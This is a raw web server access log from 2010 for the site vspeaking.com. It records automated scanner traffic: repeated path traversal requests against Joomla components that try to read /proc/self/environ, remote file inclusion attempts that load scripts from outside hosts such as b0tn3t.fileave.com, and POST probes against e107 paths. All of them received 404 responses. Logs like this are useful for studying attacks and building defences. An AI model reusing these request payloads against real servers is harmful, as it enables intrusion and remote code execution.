195.199.244.244 - - [25/Jul/2010:22:42:24 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:43:14 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:43:14 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:43:15 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
207.46.199.199 - - [25/Jul/2010:22:44:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
195.199.244.244 - - [25/Jul/2010:22:47:46 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:48:20 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:48:42 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:50:06 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:52:28 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:52:53 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:54:49 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:54:50 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:22:54:50 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:55:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:55:36 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:55:36 -0700] "GET /logs/scripts.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:55:39 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:55:39 -0700] "GET /logs/scripts.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:55:39 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:58:31 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:58:31 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:58:31 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:58:36 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:58:36 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:58:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:59:28 -0700] "GET /logs/access_100607.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
62.44.82.118 - - [25/Jul/2010:22:59:37 -0700] "GET /logs/access_100607.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:01 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:01 -0700] "POST /e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:01 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:02 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:02 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:02 -0700] "POST /e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:02 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:02 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:02 -0700] "POST /e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:03 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:03 -0700] "POST /logs/access.log/e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
72.51.33.26 - - [25/Jul/2010:23:01:03 -0700] "POST /e107 HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:02:23 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:02:23 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:02:23 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:02:47 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
87.98.217.83 - - [25/Jul/2010:23:02:47 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:03:37 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:03:37 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:03:37 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:06:57 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:08:27 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:09:29 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
121.78.118.123 - - [25/Jul/2010:23:10:09 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:10:24 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:10:24 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:10:24 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:10:47 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:11:01 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:11:01 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:11:10 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
121.78.118.123 - - [25/Jul/2010:23:11:20 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.vspeaking.com"
114.108.151.149 - - [25/Jul/2010:23:11:22 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:11:35 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:02 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:12:03 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:12:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:12:04 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:13 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:15 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:15 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:15 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:12:23 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:12:23 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:12:24 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:29 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:29 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:40 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:44 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:44 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:12:44 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:13:07 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:13:07 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:13:07 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
67.195.37.180 - - [25/Jul/2010:23:13:28 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
67.195.37.180 - - [25/Jul/2010:23:13:29 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:13:34 -0700] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:13:37 -0700] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:13:37 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:13:38 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:13:38 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:13:38 -0700] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:14:52 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:14:52 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:14:52 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:14:54 -0700] "GET /logs/access_100607.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:14:54 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:14:54 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:15:59 -0700] "GET /logs/access.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:15:59 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:15:59 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "vspeaking.com"
66.187.106.151 - - [25/Jul/2010:23:17:07 -0700] "GET /logs/access.log//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
66.187.106.151 - - [25/Jul/2010:23:17:07 -0700] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
66.187.106.151 - - [25/Jul/2010:23:17:07 -0700] "GET /logs//index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:17:16 -0700] "GET /logs/access_100607.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:36 -0700] "GET /logs/access.log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:37 -0700] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:38 -0700] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:47 -0700] "GET /logs/access.log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:48 -0700] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:48 -0700] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:17:50 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:17:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:17:50 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:53 -0700] "GET /logs/access.log/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:54 -0700] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
112.104.57.22 - - [25/Jul/2010:23:17:55 -0700] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "vspeaking.com"
66.187.106.151 - - [25/Jul/2010:23:18:50 -0700] "GET /logs/access.log//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
66.187.106.151 - - [25/Jul/2010:23:18:50 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
66.187.106.151 - - [25/Jul/2010:23:18:50 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
195.199.244.244 - - [25/Jul/2010:23:19:11 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "vspeaking.com"
195.199.244.244 - - [25/Jul/2010:23:19:11 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "vspeaking.com"
195.199.244.244 - - [25/Jul/2010:23:19:12 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.830" "vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:19:21 -0700] "GET /logs/access_100607.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:19:32 -0700] "GET /logs/access_100607.log//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:19:32 -0700] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
205.234.145.217 - - [25/Jul/2010:23:19:32 -0700] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:19:55 -0700] "GET /logs/access_100607.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:19:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
91.215.170.13 - - [25/Jul/2010:23:19:55 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.vspeaking.com"
